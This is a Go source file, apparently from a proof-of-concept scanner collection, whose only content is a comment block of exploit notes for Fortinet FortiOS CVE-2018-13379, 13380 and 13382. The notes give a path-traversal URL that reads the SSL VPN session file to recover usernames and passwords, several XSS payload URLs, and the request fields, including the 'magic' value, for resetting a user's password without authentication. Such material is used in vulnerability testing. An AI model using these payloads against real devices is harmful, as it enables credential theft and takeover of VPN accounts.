package pocs_go

/*
https://www.yisu.com/zixun/499765.html
https://github.com/ianxtianxt/CVE-2018-13379
CVE-2018-13379: Pre-auth任意文件读取,可以获得用户名和密码
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

CVE-2018-13380 Fortinet FortiOS xss漏洞
Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.8
/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E
/remote/loginredir?redir=6a6176617363726970743a616c65727428646f63756d656e742e646f6d61696e29
/message?title=x&msg=%26%23<svg/onload=alert(1)>;

CVE-2018-13382 Fortinet FortiOS magic后门
Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.9 Fortinet Fortios 5.4.11
/remote/login?lang=en

changePassword修改密码
/remote/logincheck
"Referer": "https://"+ip+"/remote/login?lang=en"
"If-Modified-Since": "Sat, 1 Jan 2000 00:00:00 GMT", "Content-Type": "text/plain;charset=UTF-8", "Connection": "close"
data = {"ajax": "1", "username": username, "realm": '', "credential": newpassword, "magic": "4tinet2095866", "reqid": "0", "credential2": newpassword}
if r.status_code==200 and 'redir=/remote/hostcheck_install' in r.text:

*/
